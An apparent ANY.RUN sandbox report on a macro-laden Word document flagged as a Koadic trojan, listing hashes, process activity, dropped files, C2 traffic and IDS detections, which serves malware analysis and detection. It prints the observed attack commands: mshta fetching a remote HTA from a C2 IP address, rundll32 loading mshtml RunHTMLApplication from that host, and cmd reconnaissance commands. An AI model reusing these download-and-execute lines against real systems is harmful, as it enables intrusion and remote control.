analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b840b2a4e5ab4c0e6a9ddc76139aa148.doc

Full analysis: https://app.any.run/tasks/c8d18e84-c38a-443f-a2db-4a6d56c120e8
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: January 23, 2019, 07:31:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
backdoor
koadic
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

B840B2A4E5AB4C0E6A9DDC76139AA148

SHA1:

ABFE3893EAFED62ED430395799CF5908F2F3FF2C

SHA256:

6AAD1F079B40B61D9924AD9FC185D8DAA68062B847D2E4D1BAFFFC7178560604

SSDEEP:

1536:/AxpoK2s/KPF7UE3U7XJSUNLmoy2+u1b5bWONWU73Sgfqa8mSQG:/AxkzPS7XbLmoyKjcUu4qaV6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2712)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • WINWORD.EXE (PID: 2712)
    • KOADIC was detected

      • mshta.exe (PID: 3532)
      • rundll32.exe (PID: 2952)
    • Connects to CnC server

      • mshta.exe (PID: 3532)
      • rundll32.exe (PID: 2952)
  • SUSPICIOUS

    • Starts application with an unusual extension

      • cmd.exe (PID: 3912)
      • cmd.exe (PID: 1048)
      • cmd.exe (PID: 3176)
      • cmd.exe (PID: 3764)
    • Connects to unusual port

      • mshta.exe (PID: 3532)
      • rundll32.exe (PID: 2952)
      • rundll32.exe (PID: 1584)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3532)
      • rundll32.exe (PID: 1584)
    • Reads internet explorer settings

      • rundll32.exe (PID: 2952)
      • rundll32.exe (PID: 1584)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2712)
    • Reads internet explorer settings

      • mshta.exe (PID: 3532)
      • mshta.exe (PID: 3304)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2712)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0xc8e48bf2
ZipCompressedSize: 426
ZipUncompressedSize: 1635
ZipFileName: [Content_Types].xml

XML

Template: Normal.dotm
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: home
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
Keywords: -
LastModifiedBy: Fredy
RevisionNumber: 2
CreateDate: 2019:01:21 14:22:00Z
ModifyDate: 2019:01:21 14:22:00Z

XMP

Title: -
Subject: -
Creator: admin
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
19
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs mshta.exe no specs #KOADIC mshta.exe cmd.exe no specs chcp.com no specs net.exe no specs net1.exe no specs cmd.exe no specs chcp.com no specs cmd.exe no specs chcp.com no specs route.exe no specs #KOADIC rundll32.exe cmd.exe no specs rundll32.exe cmd.exe no specs chcp.com no specs cmd.exe no specs hostname.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2712"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b840b2a4e5ab4c0e6a9ddc76139aa148.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3304mshta C:\Users\admin\Favorites\file.htaC:\Windows\system32\mshta.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3532mshta http://185.20.186.77:9999/MSOFFICEC:\Windows\system32\mshta.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3912"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\admin\AppData\Local\Temp\d6018e76-399a-8375-d2e2-475cb19afb20.txt 2>&1C:\Windows\system32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2316chcp 437 C:\Windows\system32\chcp.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2860net session C:\Windows\system32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3272C:\Windows\system32\net1 session C:\Windows\system32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1048"C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\admin\AppData\Local\Temp\cwd.txt 2>&1C:\Windows\system32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2596chcp 437 C:\Windows\system32\chcp.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3176"C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT -4 1> C:\Users\admin\AppData\Local\Temp\5a622402-29d0-4452-5667-ba61385cb7c5.txt 2>&1C:\Windows\system32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 077
Read events
1 001
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
5
Unknown types
2

Dropped files

PID
Process
Filename
Type
2712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR912A.tmp.cvr
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13AA99E6.png
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BEB1377D-D74F-45A0-9944-F7CA046B3821}.tmp
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DCD3699E-722F-4FA5-B3C0-39F92F2E5623}.tmp
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D702C097-29C3-4B9E-9D11-0BF32D8A8E2E}.tmp
MD5:
SHA256:
3912cmd.exeC:\Users\admin\AppData\Local\Temp\d6018e76-399a-8375-d2e2-475cb19afb20.txt
MD5:
SHA256:
3176cmd.exeC:\Users\admin\AppData\Local\Temp\5a622402-29d0-4452-5667-ba61385cb7c5.txt
MD5:
SHA256:
3764cmd.exeC:\Users\admin\AppData\Local\Temp\3279b0e9-2d7a-2d30-6a7e-b006e7eb214f.txt
MD5:
SHA256:
2952rundll32.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\MSOFFICE[1]html
MD5:A1A79FEA4E56E5416C3DF3EC62257ACA
SHA256:59E72ED9E67E1B05CB90E0D7FAF0A5156A5558CFE41DD0CF8E26E9998873BEC2
1584rundll32.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\MSOFFICE[1]html
MD5:716FEC25BE6A47C1265DAB5A355A3D24
SHA256:7295D28DE22A0E47D9CF61CE6AA0D3926E60133EA783111C43A5F1CADAC4828F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
8
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3532
mshta.exe
GET
185.20.186.77:9999
http://185.20.186.77:9999/MSOFFICE
NL
malicious
3532
mshta.exe
POST
185.20.186.77:9999
http://185.20.186.77:9999/MSOFFICE?sid=9996b4a91b7d42ef9d09cfd04e8293da;csrf=;
NL
malicious
2952
rundll32.exe
GET
185.20.186.77:9999
http://185.20.186.77:9999/MSOFFICE?sid=9996b4a91b7d42ef9d09cfd04e8293da;csrf=;\..\..\..\mshtml,RunHTMLApplication
NL
malicious
2952
rundll32.exe
POST
185.20.186.77:9999
http://185.20.186.77:9999/MSOFFICE?sid=9996b4a91b7d42ef9d09cfd04e8293da;csrf=stage;
NL
malicious
1584
rundll32.exe
GET
185.20.186.77:9999
http://185.20.186.77:9999/MSOFFICE?sid=9996b4a91b7d42ef9d09cfd04e8293da;csrf=a4cb73c7cb9f4a4d8fe6ce828f32d123;\..\..\..\mshtml,RunHTMLApplication
NL
malicious
2952
rundll32.exe
POST
185.20.186.77:9999
http://185.20.186.77:9999/MSOFFICE?sid=9996b4a91b7d42ef9d09cfd04e8293da;csrf=stage;
NL
malicious
1584
rundll32.exe
POST
185.20.186.77:9999
http://185.20.186.77:9999/MSOFFICE?sid=9996b4a91b7d42ef9d09cfd04e8293da;csrf=a4cb73c7cb9f4a4d8fe6ce828f32d123;
NL
malicious
1584
rundll32.exe
POST
185.20.186.77:9999
http://185.20.186.77:9999/MSOFFICE?sid=9996b4a91b7d42ef9d09cfd04e8293da;csrf=a4cb73c7cb9f4a4d8fe6ce828f32d123;
NL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2952
rundll32.exe
185.20.186.77:9999
Serverius Holding B.V.
NL
malicious
3532
mshta.exe
185.20.186.77:9999
Serverius Holding B.V.
NL
malicious
1584
rundll32.exe
185.20.186.77:9999
Serverius Holding B.V.
NL
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
3532
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader MacroLoader MSOffice
3532
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
3532
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] Koadic.Rootkit Check-in
2 ETPRO signatures available at the full report
No debug info